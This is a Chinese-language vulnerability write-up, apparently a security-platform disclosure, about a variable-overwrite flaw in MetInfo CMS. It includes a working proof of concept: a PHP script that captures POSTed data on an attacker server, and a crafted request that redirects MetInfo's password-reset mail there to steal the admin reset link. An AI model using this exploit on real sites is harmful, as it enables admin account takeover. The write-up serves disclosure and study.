发布时间:2016-08-25
公开时间:N/A
漏洞类型:变量覆盖
危害等级:高
漏洞编号:xianzhi-2016-08-41454550
测试版本:N/A
漏洞详情
config/config.inc.php
$query = "SELECT FROM $metconfig WHERE lang='$lang' or"; $result = $db->query($query); while($list_config= $db->fetch_array($result)){ $_M[config][$list_config['name']]=$list_config['value']; if($metinfoadminok)$list_config['value']=str_replace('"', '"', str_replace("'", ''',$list_config['value'])); $settings_arr[]=$list_config; if($list_config['columnid']){ $settings[$list_config['name'].''.$listconfig['columnid']]=$list_config['value']; }else{ $settings[$list_config['name']]=$list_config['value']; } if($list_config['flashid']){ $list_config['value']=explode('|',$list_config['value']); $falshval['type']=$list_config['value'][0]; $falshval['x']=$list_config['value'][1]; $falshval['y']=$list_config['value'][2]; $falshval['imgtype']=$list_config['value'][3]; $list_config['mobile_value']=explode('|',$list_config['mobile_value']); $falshval['wap_type']=$list_config['mobile_value'][0]; $falshval['wap_y']=$list_config['mobile_value'][1]; $met_flasharray[$list_config['flashid']]=$falshval; } } $_M[lang]=$lang; @extract($settings)从数据库中取出系统配置信息,然后用extract()函数初始化各个变量
admin/include/common.inc.php
require_once ROOTPATH.'config/config.inc.php'; ……………… isset($_REQUEST['GLOBALS']) && exit('Access Error'); unset($_POST['met_webkeys']); unset($_GET['met_webkeys']); unset($_POST['metinfo_admin_name']); unset($_GET['metinfo_admin_name']); unset($_GET['met_cookie']); unset($_COOKIE['met_cookie']); unset($_POST['met_cookie']); foreach(array('_COOKIE', '_POST', '_GET') as $_request) { foreach($$_request as $_key => $_value) { $_key{0} != '' && $$_key = daddslashes($_value,0,0,1); $_M['form'][$_key]=daddslashes($_value,0,0,1); } }先引用了config.inc.php 然后做了一次伪全局的注册 等于所有被config.inc.php初始化的配置都可以被任意覆盖了
800多个配置项 哪个进了sql 哪个进了关键逻辑 哪个进了命令执行 都不好说
实在是太多了没有一个一个变量跟进去看逻辑 找了个后台不用登录就能访问的文件
admin/admin/getpassword.php 行144
$sendMail=jmailsend($from,$fromname,$to,$title,$body,$usename,$usepassword,$smtp); if($sendMail==0){ require_once ROOTPATH.'include/export.func.php'; $post=array('to'=>$to,'title'=>$title,'body'=>$body); $met_file='/passwordmail.php'; $sendMail=curl_post($post,30); if($sendMail=='nohost')$sendMail=0; }当jmailsend失败的时候 就会使用curl_post函数来发送
include/export.func.php
function curl_post($post,$timeout){ global $met_weburl,$met_host,$met_file; $host=$met_host; $file=$met_file; if(get_extension_funcs('curl')&&function_exists('curl_init')&&function_exists('curl_setopt')&&function_exists('curl_exec')&&function_exists('curl_close')){ $curlHandle=curl_init(); curl_setopt($curlHandle,CURLOPT_URL,'http://'.$host.$file); curl_setopt($curlHandle,CURLOPT_REFERER,$met_weburl); curl_setopt($curlHandle,CURLOPT_RETURNTRANSFER,1); curl_setopt($curlHandle,CURLOPT_CONNECTTIMEOUT,$timeout); curl_setopt($curlHandle,CURLOPT_TIMEOUT,$timeout); curl_setopt($curlHandle,CURLOPT_POST, 1); curl_setopt($curlHandle,CURLOPT_POSTFIELDS, $post); $result=curl_exec($curlHandle); curl_close($curlHandle); }$met_host其实是metinfo的api接口地址 保存在数据库met_config表中
所以 只要修改met_host为可控的地址 就能直接拦下修改密码的验证邮件
证明如下
先写个收信脚本passwordmail.php 丢到自己服务器上web根目录
<?php file_put_contents('x.txt',$_POST['body']);然后 发包
Host: www.xxxxx.net.cn User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: recordurl=%2Chttp%253A%252F%252Fwww.xxxxx.net.cn%252F Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 76 action=next2&abt_type=2&admin_mobile=admin&submit=1&met_host=123.456.789.000
met_host=改成自己的服务器地址
查看自己服务器web跟目录下的x.txt就能找到重置密码的链接
view.png
作者:索马里的乌贼
链接:https://www.jianshu.com/p/03e7bccc2bad
随时随地看视频
